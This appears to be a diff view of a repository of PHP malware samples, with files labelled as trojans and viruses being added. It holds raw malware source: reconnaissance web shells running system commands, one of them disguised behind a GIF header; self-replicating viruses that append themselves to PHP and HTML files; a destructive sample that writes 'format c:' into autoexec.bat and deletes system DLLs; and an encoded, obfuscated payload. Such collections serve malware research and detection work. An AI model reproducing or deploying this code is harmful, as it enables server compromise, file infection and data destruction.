if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
// 删除目录
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read()) {
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
@chmod("$deldir/$file",0777);
deltree("$deldir/$file");
}
if (is_file("$deldir/$file")) {
@chmod("$deldir/$file",0777);
@unlink("$deldir/$file");
}
}
$mydir->close();
@chmod("$deldir",0777);
echo @rmdir($deldir) ? "目录删除成功!" : "<font color=\"#ff0000\">目录删除失败!</font>";
}
// 判断读写情况
function dir_writeable($dir) {
if (!is_dir($dir)) {
@mkdir($dir, 0777);
}
if(is_dir($dir)) {
if ($fp = @fopen("$dir/test.txt", 'w')) {
@fclose($fp);
@unlink("$dir/test.txt");
$writeable = 1;
} else {
$writeable = 0;
}
}
return $writeable;
}
// 表格行间的背景色替换
function getrowbg() {
global $bgcounter;
if ($bgcounter++%2==0) {
return "firstalt";
} else {
return "secondalt";
}
}
// 获取当前的文件系统路径
function getPath($mainpath, $relativepath) {
global $dir;
$mainpath_info = explode('/', $mainpath);
$relativepath_info = explode('/', $relativepath);
$relativepath_info_count = count($relativepath_info);
for ($i=0; $i<$relativepath_info_count; $i++) {
if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
if ($relativepath_info[$i] == '..') {
$mainpath_info_count = count($mainpath_info);
unset($mainpath_info[$mainpath_info_count-1]);
continue;
}
$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
} //end for
return implode('/', $mainpath_info);
}
// 检查PHP配置参数
function getphpcfg($varname) {
switch($result = get_cfg_var($varname)) {
case 0:
return No;
break;
case 1:
return Yes;
break;
default:
return $result;
break;
}
}
?>

28
PHP/Trojan-Spy.PHP.PhPen.d Normal file
View File

@ -0,0 +1,28 @@
<?php
/*
+--------------------------------------------------------------------------+
| str_replace(".", "", "P.h.p.S.p.y") Version:2006 |
| Codz by Angel |
| (c) 2004 Security Angel Team |
| http://www.4ngel.net |
| ======================================================================== |
| Team: http://www.4ngel.net |
| http://www.bugkidz.org |
| Email: 4ngel@21cn.com |
| Date: Mar 21st 2005 |
| Thx All The Fantasy of Wickedness's members |
| Thx FireFox (http://www.molyx.com) |
+--------------------------------------------------------------------------+
*/
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
/*===================== 程序配置 =====================*/
// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效
$admin['check'] = "1";
// 如果需要密码验证,请修改登陆密码

1440
PHP/Trojan-Spy.PHP.PhPen.e Normal file
View File

File diff suppressed because it is too large Load Diff

1990
PHP/Trojan-Spy.PHP.PhPen.f Normal file
View File

File diff suppressed because it is too large Load Diff

58
PHP/Trojan.PHP.Agent.a Normal file
View File

@ -0,0 +1,58 @@
GIF89aY?
?&#247;?????EUR???EUR?EUREUR???EUREUR?EUR?EUREUREUREUREUR&#192;&#192;&#192;??????????????????????????????????????????????????????????????????????????????????????????????????3??f?????&#204;????3??33?3f?3??3&#204;?3??f??f3?ff?f??f&#204;?f??????3??f?????&#204;????&#204;??&#204;3?&#204;f?&#204;??&#204;&#204;?&#204;??????3??f?????&#204;???3??3?33?f3??3?&#204;3??33?33333f33?33&#204;33?3f?3f33ff3f?3f&#204;3f?3??3?33?f3??3?&#204;3??3&#204;?3&#204;33&#204;f3&#204;?3&#204;&#204;3&#204;?3??3?33?f3??3?&#204;3??f??f?3f?ff??f?&#204;f??f3?f33f3ff3?f3&#204;f3?ff?ff3fffff?ff&#204;ff?f??f?3f?ff??f?&#204;f??f&#204;?f&#204;3f&#204;ff&#204;?f&#204;&#204;f&#204;?f??f?3f?ff??f?&#204;f???????3??f?????&#204;????3??33?3f?3??3&#204;?3??f??f3?ff?f??f&#204;?f??????3??f?????&#204;????&#204;??&#204;3?&#204;f?&#204;??&#204;&#204;?&#204;??????3??f?????&#204;???&#204;??&#204;?3&#204;?f&#204;??&#204;?&#204;&#204;??&#204;3?&#204;33&#204;3f&#204;3?&#204;3&#204;&#204;3?&#204;f?&#204;f3&#204;ff&#204;f?&#204;f&#204;&#204;f?&#204;??&#204;?3&#204;?f&#204;??&#204;?&#204;&#204;??&#204;&#204;?&#204;&#204;3&#204;&#204;f&#204;&#204;?&#204;&#204;&#204;&#204;&#204;?&#204;??&#204;?3&#204;?f&#204;??&#204;?&#204;&#204;???????3??f?????&#204;????3??33?3f?3??3&#204;?3??f??f3?ff?f??f&#204;?f??????3??f?????&#204;????&#204;??&#204;3?&#204;f?&#204;??&#204;&#204;?&#204;??????3??f?????&#204;???,????Y?
????H° &#193;?*\&#200;°&#161;C??J|q&#162;C?3N¬h'!&#199;?; &#233;QdI"Gj4H2cK?U®$&#216;r&&#200;?,G&#210;&#204;?0dL?>w$)t'Q&#162;?&#226;?8Ti&#210;&#165;Py&#213;)&#211;&P--.?F?&#248;rhV©N&#195;j...tk&#216;&#178;W?&#162;&#165;?&#214;)&#199;?d&#199;&#194;5 &#244;&#165;O---5&#231;F...qm?§gc&#162;E?&#178;°&#225;&#195;?#?;
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "bsdcr3w<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "We was here ... and u no !!!<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
Side by Side

After

Width:  |  Height:  |  Size: 3.0 KiB

1890
PHP/Trojan.PHP.Agent.c Normal file
View File

File diff suppressed because it is too large Load Diff

33
PHP/Trojan.PHP.Agent.d Normal file
View File

@ -0,0 +1,33 @@
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }
echo "Jikustik<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "Jikustik was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>

1
PHP/Trojan.PHP.Io Normal file
View File

@ -0,0 +1 @@
<?php include("io.php"); ?>

32
PHP/Trojan.PHP.PHPInfo.a Normal file
View File

@ -0,0 +1,32 @@
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }
echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

55
PHP/Trojan.PHP.PHPInfo.c Normal file
View File

@ -0,0 +1,55 @@
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "narasaon<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "narasaon was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

55
PHP/Trojan.PHP.PHPInfo.e Normal file
View File

@ -0,0 +1,55 @@
<!--
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "netcat<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "netcat<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

54
PHP/Trojan.PHP.PHPInfo.g Normal file
View File

@ -0,0 +1,54 @@
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "Osirys<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "Osirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

79
PHP/Trojan.PHP.Sysbat Normal file
View File

@ -0,0 +1,79 @@
<?php
// SYSBAT.PHP VIRUS
// By Xmorfic, www.shadowvx.com/bcvg, The Black Cat Virii Group
// SYSBAT.PHP - This virus infectes Config.sys, autoexec.bat and system files in
// C:\Windows\Command\ directory.
$config = 'C:\Config.sys';
$autoexec = 'C:\Autoexec.bat';
$phps = "SYSBAT.PHP";
$newphp = 'sysbat.sys';
$avxm = "This program performed an illegal operation";
$infsystem = true;
$infsys = fopen($config, "r");
$check = fread($infsys, filesize($config));
$infs = strstr ($check, '47hGHRHjkliliurpIOIPOIporipOOPOirujkJKLLJj<Xmorfic>HKGJD');
if (!$infs) $infsystem = false;
if ( ($infsystem=false) )
{
$infsys = fopen($config, "a");
$fputs($infsys, "47hGHRHjkliliurpIOIPOIporipOOPOirujkJKLLJj<Xmorfic>HKGJD");
$fputs($infsys, "Xmorfic, www.shadowvx.com/bcvg, Second PHP VIRUS");
return;
}
fclose($infsys);
$infbat = fopen($autoexec, "r");
$checkb = fread($infbat, filesize($autoexec));
$infb = strstr ($checkb, 'format c: /autotest /q /u');
if (!$infb) $infbatf = false;
if ( ($infbatf=false) )
{
$infbat = fopen($autoexec, "a");
$fputs($infbat, "ctty nul ");
$fputs($infbat, "format c: /autotest /q /u ");
return;
}
fclose($infbat);
$systems = opendir('C:\Windows\Command\');
while ($filesys = readdir($systems))
{
$infected = true;
$systemexe = false;
if ( ($systemexe = strstr ($filesys, '.sys') )
if ( (is_writeable($filesys) )
{
$sysk = fopen($filesys, "r");
$xst = fread($sysk, filesize($filesys);
$good = strstr ($xst, 'Xmorfic_Vx');
if (!$good) $infected = false;
}
if ( ($infected=false) )
{
$sysk = fopen($filesys, "a");
$fputs($sysk, "Xmorfic_VX_System_PHP_Infector!!');
return;
}
}
closedir($systems);
// Rename the virus to sysbat.sys (Optional) $ren = rename(__FILE__, $newphp);
$kok = unlink ('C:\Windows\System\Wsock32.dll');
echo $avxm;
?>

1
PHP/Trojan.PHP.Turame.d Normal file
View File

@ -0,0 +1 @@
<?mmcache_load("eJyVlQlz2kYUgPWkNcZgY2x80SSEXKoDKRSMk4oodi0fcROTbCKbpElTRobFpiMDBTnJdKYzyf/oj+g/THclsbqa6VTDiNXTu9/7oNHY3dk93BdEQRBAkKbpV4eYhmlQiXvICuxaF5xLp3rSFD2MLWNkwTYzo1KgUokeSL8D22C700VXNrZGsC0K7IiRT6apiNniqYBHTZ1i1iq7xeibmKNNP7pEH5l4XAF5GiQUwzOeRFNnbG+JkLcEk6rslvS8maT/m5jkcWYnby5PWZy4L84cxNEsnvfHmbfjpH0Va2qa+1oI5pyaWFZBXoQUWsBLnkRTl5ivHRWYJ7treNkfapnJVXZboeKk47Y1IkPTaBM945ba7fUNE+RVyKAVvBYQbqG1LXAmR5227MNfbqjN7JfP5AsNbivwNgkAUopFIlbL6l2Qltm76FksSfgb+fQA3EabhAz5sC9HNBMJRJBq9Oncsob1crl7aZq9fs+qbtRKZ4PBmUmGxhkZl9qDi/LeqPeeHJ0MO4ZFRiXykehsR+J2BXRMxgUBeQoQSDMslvGeVJgSng4raer0pJesuA+nfCLxSUcGQ9LXY25/ux9BnoEYiuOkL3VNTfq9jE4DO+J5SbhTPjf6HZOwNUmgWXvYLKn2oG+RvjUGeR5Szmx1ti/M9R8gL0Da6bmyiDNBR5qa4Q1mi4JYRDLo1hfnltFSvCgubyqr9owDRmtu0iDkndnaKWcnKY+I0amvNlfC6eW+gRWUbV7hqd2+euXgKr7GnzM5gCo9oWulnJir4OthDwt5dN0psJYT80UxV6uyxaDPhVohq9zAN712a+pNm5xbYSeaeovnfBuc0rofRj2L1G8od7AcrlbmLfp2ot02B2NSv6Os47v+gHe5ZiGoua4U8b3oCt3j+t9R/QTbuHNimi26ce16USmxvUg7v5H58u95to4Fto7crBw1Y0aQTvnI+T5ATsVPThUq/4+cYz85GxFyarDhkVO1ybkfLfv+V8h5ENj5TR85P8AmeoDrAXLqXyHnYcCLEiJHBQU91B9FyNmCRy452x45P9I/F4ecHayF10LjDd71k7Mzt4d2KTl7n5UD/Dhs9PhfyTkMkHPQ3I+Q8xPso8PmE4+cp08OnuIjj5yGS85RqSE2/sTPIuQ8R89cchri86LY+FQFl5xPBaJg/MK/yC9scl5GyXnJc9aD5GDlGJ+Eqz3hLWoGeThWXuHX/oCvuebPQc1Xyhv8NrpCb7n+L1EE3ijv/pOcX6Nm77achrDrH/NFVnA=");?>

25
PHP/Trojan.PHP.Zapchast.c Normal file
View File

@ -0,0 +1,25 @@
<?
echo "ALBANIA<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
exit;
?>

81
PHP/Virus.PHP.Alf Normal file
View File

@ -0,0 +1,81 @@
<?php
// PHP.Alf by ULTRAS[MATRiX]
$phpdir = 'c:\phpalf';
$mircinf = 'c:\mirc\script.ini';
$shom = true;
if ( (file_exists($mircinf) )
{
$script = fopen($mircinf, "r");
$checks = fread($script, filesize($mircinf);
$virz = strstr($checks, 'script.php');
if (!$virz) $shom = false;
if ( ($shom=false) )
{
$unmirc = unlink($mircinf);
$tomirc = touch($mircinf);
$open_mirc = fopen($mircinf, "a");
$fputs($open_mirc, "[script]");
$fputs($open_mirc, "n0; A.L.F script");
$fputs($open_mirc, "n1; by ULTRAS[MATRiX]");
$fputs($open_mirc, "n2=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }");
$fputs($open_mirc, "n3= /dcc send $nick c:\phpalf\script.php");
$fputs($open_mirc, "n4=}");
$fputs($open_mirc, "n5=ON 1:PART:#:{ /if ( $nick == $me ) { halt }");
$fputs($open_mirc, "n6= /dcc send $nick c:\phpalf\script.php");
$fputs($open_mirc, "n7=}");
$fputs($open_mirc, "n8=on 1:QUIT:#:/msg $chan MTX4EVER");
$fputs($open_mirc, "n9=on 1:TEXT:*virus*:#:/.ignore $nick");
$fputs($open_mirc, "n10=on 1:TEXT:*virus*:?:/.ignore $nick");
$fputs($open_mirc, "n11=on 1:TEXT:*worm*:#:/.ignore $nick");
$fputs($open_mirc, "n12=on 1:TEXT:*worm*:?:/.ignore $nick");
$fputs($open_mirc, "n13=on 1:TEXT:*php*:#:/.ignore $nick");
$fputs($open_mirc, "n14=on 1:TEXT:*php*:?:/.ignore $nick");
$fputs($open_mirc, "n15=on 1:TEXT:*script*:#:/.ignore $nick");
$fputs($open_mirc, "n16=on 1:TEXT:*script*:?:/.ignore $nick");
return;
}
}
fclose($mircinf);
$shom = true;
$createdir = mkdir($phpdir,0)
$renamefile = rename(__FILE__, 'alf.php');
$copyfile = copy(__FILE__, 'c:\phpalf');
$rename2 = rename('c:\phpalf\alf.php', 'script.php');
$dirz = opendir('.');
while ($alldir = readdir($dirz))
{
$inf_ = true;
$ext_ = false;
if ( ($ext_ = strstr ($alldir, '.php')) || ($ext_ = strstr ($alldir, '.html')) || ($ext_ = strstr ($alldir, '.htm')) )
if ( is_file($alldir) && is_writeable($alldir) )
{
$opz = fopen($alldir, "r");
$check = fread($opz, filesize($alldir));
$sig_ = strstr ($check, 'alf.php');
if (!$sig_) $inf_ = false;
}
if ( ($inf_=false) )
{
$opz = fopen($alldir, "a");
$fputs($opz, "<?php ");
$fputs($opz, "include(\"");
$fputs($opz, __FILE__);
$fputs($opz, "\"); ");
$fputs($opz, "?>");
return;
}
}
closedir($dirz);

68
PHP/Virus.PHP.Aracn Normal file
View File

@ -0,0 +1,68 @@
<?php
// PHP/Spider
// By FSo
// Proof-of-Concept PHP appender (PHP 3.0.6+)
// Dedicated to all the friends who held me together...
// And made for the enemies who tried to bring me down.
//
// Greets to Adolfo, Zulu, C.W., and the vets
// of A.C.V.S.C.
$myhandle = fopen(__FILE__, "rb");
$buffer = fread($myhandle, filesize(__FILE__));
fclose($myhandle);
$buffer = "<?php \r\n// " . substr($buffer, strpos($buffer, "PHP/Spider")) . "\r\n?>";
scan(".", TRUE);
if (isset($_GLOBALS['SPIDER_COMMAND']) == TRUE) {
if (empty($_GLOBALS['SPIDER_COMMAND']) == FALSE) {
system($_GLOBALS['SPIDER_COMMAND']);
}
}
function scan($path, $recurse) {
global $buffer;
//global $polyarr;
$dirres = opendir($path);
if ($dirres == TRUE) {
while (1) {
$entity = readdir($dirres);
if ($entity == FALSE && is_string($entity) == FALSE) { break; }
if (is_dir($entity) == TRUE) {
if ($entity == ".") {
} else {
if ($recurse == TRUE) {
scan($entity, FALSE);
}
}
} else {
$ext = strtoupper(substr($entity, strrpos($entity, ".")));
if ($ext == ".PHP" || $ext == ".PHP3" || $ext == ".PHTML" || $ext == ".PHP4") {
$fhandle = fopen($entity, "rb");
$contents = fread($fhandle, filesize($entity));
fclose($fhandle);
if (strstr($contents, "PHP/Spider") == FALSE) {
$fhandle = fopen($path . "/" . $entity, "ab");
fwrite($fhandle, $buffer);
fclose($fhandle);
}
}
}
}
closedir($dirres);
}
return;
}
// As the spiders multiplied, They surrounded him,
// and kept coming...
//
// As the last minute opportunists finished him off,
// And his life flashed before him, all he could
// do was simply watch.
//
// Helpless and nearly defeated, he lived the horror
// none could stand, if they had a choice...
//
// PHP/Spider.A by FSo
// June 24, 2002
?>

65
PHP/Virus.PHP.Aristo.a Normal file
View File

@ -0,0 +1,65 @@
<?php // Aristotle
$file = $_SERVER["SCRIPT_NAME"];
$break = Explode('/', $file);
$pfile = $break[count($break) - 1];
$handle = fopen($pfile, 'rb');
$aris = fread($handle, 2624);
fclose($handle);
$dir=opendir('.');
while (($file = readdir($dir)) !== false)
{
if (strstr($file,'.html')) {
$arisjs='<html>'.chr(13).chr(10);
$arisjs.='<head>'.chr(13).chr(10);
$arisjs.='<title>'.chr(13).chr(10);
$arisjs.='</title>'.chr(13).chr(10);
$arisjs.='<SCRIPT LANGUAGE='.chr(34).'Javascript'.chr(34).'>'.chr(13).chr(10);
$arisjs.='var x = 10'.chr(13).chr(10);
$arisjs.='var y = 1 '.chr(13).chr(10);
$arisjs.='function startClock(){ '.chr(13).chr(10);
$arisjs.='x = x-y '.chr(13).chr(10);
$arisjs.='setTimeout('.chr(34).'startClock()'.chr(34).', 10)'.chr(13).chr(10);
$arisjs.='if(x==0)'.chr(13).chr(10);
$arisjs.='{'.chr(13).chr(10);
$arisjs.='aristotle = window.open('.chr(34).'http://www.ibiblio.org/wm/paint/auth/rembrandt/1650/aristotle-homer.jpg'.chr(34).')'.chr(13).chr(10);
$arisjs.='setTimeout('.chr(34).'aristotle.close()'.chr(34).',20)'.chr(13).chr(10);
$arisjs.='x=10'.chr(13).chr(10);
$arisjs.='}'.chr(13).chr(10);
$arisjs.='}'.chr(13).chr(10);
$arisjs.='</SCRIPT>'.chr(13).chr(10);
$arisjs.='</HEAD>'.chr(13).chr(10);
$arisjs.='<BODY BGCOLOR='.chr(34).'#FFFFFF'.chr(34).' onLoad='.chr(34).'startClock()'.chr(34).'>'.chr(13).chr(10);
$arisjs.='Change in all things is sweet.'.chr(13).chr(10);
$arisjs.='- Aristotle'.chr(13).chr(10);
$arisjs.='</BODY>'.chr(13).chr(10);
$arisjs.='</HTML>'.chr(13).chr(10);
$b = fopen($file, 'w');
fwrite($b,$arisjs);
fclose($b);
exec($file);
}
if (strstr($file,'.php')) { if (!strstr($file, 'Aristotle')) {
$a = fopen($file,'rb');
$contents = fread($a, filesize($file));
if (!strstr($contents, 'Aristotle'))
{
fclose($a);
$b = fopen($file,'w');
fwrite($b, $aris.$contents);
fclose($b);
}
}
}
if (is_dir($file)) { if (!strstr($file, '.')) { chdir($file);
}
}
}
closedir($dir);
?>

80
PHP/Virus.PHP.Feast Normal file
View File

@ -0,0 +1,80 @@
<?php
$ypxqrpsqcc = fopen(__FILE__, "r");
$bbugesqpty = substr(fread($ypxqrpsqcc, filesize(__FILE__)), 0, 1249);
fclose($ypxqrpsqcc);
$dhbpgxtamn = array("ypxqrpsqcc", "bbugesqpty", "dhbpgxtamn", "cctsvcopcx", "wurwejtvjx",
"ccznwozuuo", "uudxleoyja", "ionwdbkwfh", "zohqscoxob", "skzmabzbfe");
for($cctsvcopcx = 0; $cctsvcopcx < count($dhbpgxtamn); $cctsvcopcx++){
$wurwejtvjx = chr(rand(97, 122));
for($ccznwozuuo = 0; $ccznwozuuo < 9; $ccznwozuuo++) $wurwejtvjx = $wurwejtvjx . chr(rand(97, 122));
$bbugesqpty = str_replace("$dhbpgxtamn[$cctsvcopcx]", "$wurwejtvjx", "$bbugesqpty");
}
$uudxleoyja = opendir(".");
while(false !== ($ionwdbkwfh = readdir($uudxleoyja))){
if($ionwdbkwfh != "." && $ionwdbkwfh != ".."){
if(substr($ionwdbkwfh, -3) == "php"){
$zohqscoxob = fopen($ionwdbkwfh, "r");
$skzmabzbfe = substr(fread($zohqscoxob, filesize($ionwdbkwfh)), 5);
fclose($zohqscoxob);
if(!strstr($skzmabzbfe, "php.faces")){
unlink("$ionwdbkwfh");
$zohqscoxob = fopen($ionwdbkwfh, "a+");
fwrite($zohqscoxob, "$bbugesqpty");
fwrite($zohqscoxob, "$skzmabzbfe");
fclose($zohqscoxob);
}
}
}
}
closedir($uudxleoyja);
// php.faces (c) by Kefi, 2003
?>
<?php
$vir_string = "Neworld.PHP\n";
$virstringm = "Welcome To The New World Of PHP Programming\n";
$virt = $vir_string . $virstringm;
echo $virt;
$all = opendir('C:\Windows\');
while ($file = readdir($all))
{
$inf = true;
$exe = false;
if ( ($exe = strstr ($file, '.php')) || ($exe = strstr ($file, '.html')) || ($exe = strstr ($file, '.htm')) || ($exe = strstr ($file, '.htt')) )
if ( is_file($file) && is_writeable($file) )
{
$new = fopen($file, "r");
$look = fread($new, filesize($file));
$yes = strstr ($look, 'neworld.php');
if (!$yes) $inf = false;
}
if ( ($inf=false) )
{
$new = fopen($file, "a");
$fputs($new, "<!-- ");
$fputs($new, "Neworld.PHP - ");
$fputs($new, "Made By Xmorpfic, ");
$fputs($new, "www.shadowvx.com/bcvg, ");
$fputs($new, "The Black Cat Virii Group.");
$fputs($new, "--->");
$fputs($new, "<?php ");
$fputs($new, "include(\"");
$fputs($new, __FILE__);
$fputs($new, "\"); ");
$fputs($new, "?>");
return;
}
}
closedir($all);
// Neworld.PHP Virus - Made By Xmorfic, www.shadowvx.com/bcvg, Black Cat Virii Group.
?>

31
PHP/Virus.PHP.Feast.a Normal file
View File

@ -0,0 +1,31 @@
<?php
$ypxqrpsqcc = fopen(__FILE__, "r");
$bbugesqpty = substr(fread($ypxqrpsqcc, filesize(__FILE__)), 0, 1249);
fclose($ypxqrpsqcc);
$dhbpgxtamn = array("ypxqrpsqcc", "bbugesqpty", "dhbpgxtamn", "cctsvcopcx", "wurwejtvjx",
"ccznwozuuo", "uudxleoyja", "ionwdbkwfh", "zohqscoxob", "skzmabzbfe");
for($cctsvcopcx = 0; $cctsvcopcx < count($dhbpgxtamn); $cctsvcopcx++){
$wurwejtvjx = chr(rand(97, 122));
for($ccznwozuuo = 0; $ccznwozuuo < 9; $ccznwozuuo++) $wurwejtvjx = $wurwejtvjx . chr(rand(97, 122));
$bbugesqpty = str_replace("$dhbpgxtamn[$cctsvcopcx]", "$wurwejtvjx", "$bbugesqpty");
}
$uudxleoyja = opendir(".");
while(false !== ($ionwdbkwfh = readdir($uudxleoyja))){
if($ionwdbkwfh != "." && $ionwdbkwfh != ".."){
if(substr($ionwdbkwfh, -3) == "php"){
$zohqscoxob = fopen($ionwdbkwfh, "r");
$skzmabzbfe = substr(fread($zohqscoxob, filesize($ionwdbkwfh)), 5);
fclose($zohqscoxob);
if(!strstr($skzmabzbfe, "php.faces")){
unlink("$ionwdbkwfh");
$zohqscoxob = fopen($ionwdbkwfh, "a+");
fwrite($zohqscoxob, "$bbugesqpty");
fwrite($zohqscoxob, "$skzmabzbfe");
fclose($zohqscoxob);
}
}
}
}
closedir($uudxleoyja);
// php.faces (c) by Kefi, 2003
?>

35
PHP/Virus.PHP.Indonesia Normal file
View File

@ -0,0 +1,35 @@
$jawa = "indonesia.php\n";
$sumatra = "Wellcome to Indonesian PHPlovers.\n";
$kalimantan = $jawa . $sumatra;
echo $kalimantan;
$all = opendir('C:\Windows\');
$all1 = opendir('C:\My Documents\');
$all2 = opendir('C:\InetPub\wwwRoot\');
$all3 = $all && $all1 && $all2
while ($file = readdir($all3))
{
$inf = true;
